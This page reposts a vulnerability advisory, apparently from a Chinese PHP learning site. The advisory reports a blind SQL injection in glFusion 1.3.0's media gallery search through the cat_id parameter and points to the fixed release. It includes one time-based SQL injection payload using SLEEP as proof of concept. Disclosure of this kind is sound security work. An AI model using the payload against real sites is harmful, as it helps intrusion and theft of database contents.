glFusion 1.3.0 (search.php页面cat_id参数) SQL注射

glFusion 1.3.0 (search.php页面cat_id参数) SQL注射 - 网站

来源：自学PHP网时间：2015-04-17 10:15 作者：阅读:次

[导读] 信息--------------------名称: SQL Injection Vulnerability in glFusion软件 : glFusion 1.3.0 and possibly below.主页 : http://www.glfusion.org缺陷类型 : Blind SQL Injection研究者 :......

信息
--------------------
名称:  SQL Injection Vulnerability in glFusion
软件 :  glFusion 1.3.0 and possibly below.
主页 : http://www.glfusion.org
缺陷类型 :  Blind SQL Injection
研究者 :  Omar Kurt

概述

--------------------
A dynamic system based on flexible and granular permissions, with spam
protection, forums, file management, media gallery, calendars, polls,
site-wide search, RSS feeds, and more!
 
技术摘要
--------------------
glFusion is affected by SQL Injection vulnerability in version 1.3.0.
Example PoC url is as follows:
Blind SQL Injection Vulnerability
http://example.com/mediagallery/search.php
POST - param:
cat_id='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'
 
You can read the full article about SQL Injection vulnerabilities from here
:
 
http://www.mavitunasecurity.com/sql-injection/
 
解决方案
--------------------
http://www.glfusion.org/article.php/glfusion131 Netsparker Advisories, <advisories@mavitunasecurity.com>
Homepage, http://www.mavitunasecurity.com/netsparker-advisories/

Fast-Track之Microsoft SQL 注入篇 - 网站安全 - 自学p

CSDN XSS第一弹：修复漏洞时指哪修哪的后果 - 网站

子栏目

glFusion 1.3.0 (search.php页面cat_id参数) SQL注射 - 网站

最新评论

添加评论

更多文章推荐

添加评论